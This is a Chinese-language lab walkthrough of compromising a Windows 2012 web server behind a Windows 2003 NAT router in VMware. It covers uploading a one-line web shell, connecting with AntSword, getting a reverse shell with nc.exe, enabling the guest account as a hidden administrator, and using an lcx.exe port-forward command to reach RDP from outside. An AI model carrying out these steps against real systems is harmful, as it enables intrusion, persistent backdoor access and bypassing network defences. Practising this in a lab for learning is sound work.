本文章仅供学习参考使用,不得以任何途径转载使用,违反任何法律法规,不得以任何名义赚取钱财等,如有违反与本人无任何关系。
一丶首先准备环境。
设备 | 虚拟机 | 配置 |
路由器 | windows 2003 | 公网ip(桥接) 内网IP(vmnet3)网卡 dhcp dns 路由与远程访问 |
web服务器 | windows 2012 | 内网(vmnet3)dhcp分配 开启http服务 |
攻击者 | kali |
二丶搭建环境
1.开启2003虚拟机安装dhcp和dns服务,注意使用vmware虚拟机的话,关闭vm虚拟机编辑器的dhcp自动获取。
2.配置dhcp,新建地址池和dns服务
3.开启Windows2012,使用dhcp获取ip
4.在windows2003上配置路由与远程访问
点击开始-管理工具-路由与远程访问
如果出现上述情按提示找到路径,禁用关闭这个服务即可
然后配置启用路由与远程访问,这里我们选择自定义
下一步启动服务之后,点击nat/基本防火墙,新建两个接口,in接口为vmnet3接口,out接口为桥接接口,然后在out接口上添加一个http服务,地址为2012dhcp分配的地址。
三丶获取shell
1.上面部署完成之后可以用2012ping一下外网
2.然后使用2003桥接的地址访问2012服务器,上传一句话木马获取目标shell
3.使用蚁剑链接一下
蚁剑工具链接:GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器
4.上传一个nc反弹shell
nc地址:https://github.com/int0x33/nc.exe.git
5.kali监听本地端口然后蚁剑执行nc反弹shell,然后查看端口。
6.没有开启3389端口,我们可以看一下我们是不是有权限,发现是超级管理员用户,
7.然后百度搜索一下发现使用这个命令可以开启3389端口
四丶远程连接完成单内网穿透
1.查看服务器的用户,发现有guest用户,我们开启这个用户,设置密码,并且给他添加到超级管理员组
2.然后在服务器上上传lcx.exe
lcx连接:lGitHub - UndefinedIdentifier/LCX: 自修改免杀lcx端口转发工具
3.使用portmap监听本地的二个端口,运行lcx,在蚁剑执行这个lcx.exe -slave 【公网服务器IP】 2333 127.0.0.1 3389这个命令来映射端口
portmap地址:GitHub - kaklakariada/portmapper: A tool for managing port forwardings via UPnP
4.使用remmina进行远程桌面链接
sudo apt-get update
sudo apt-get install remmina
执行上面两个命令安装remmina
启动remmina
在这里输入本地地址
然后输入刚才开启的guest用户和密码,远程登陆成功,完成单内网穿透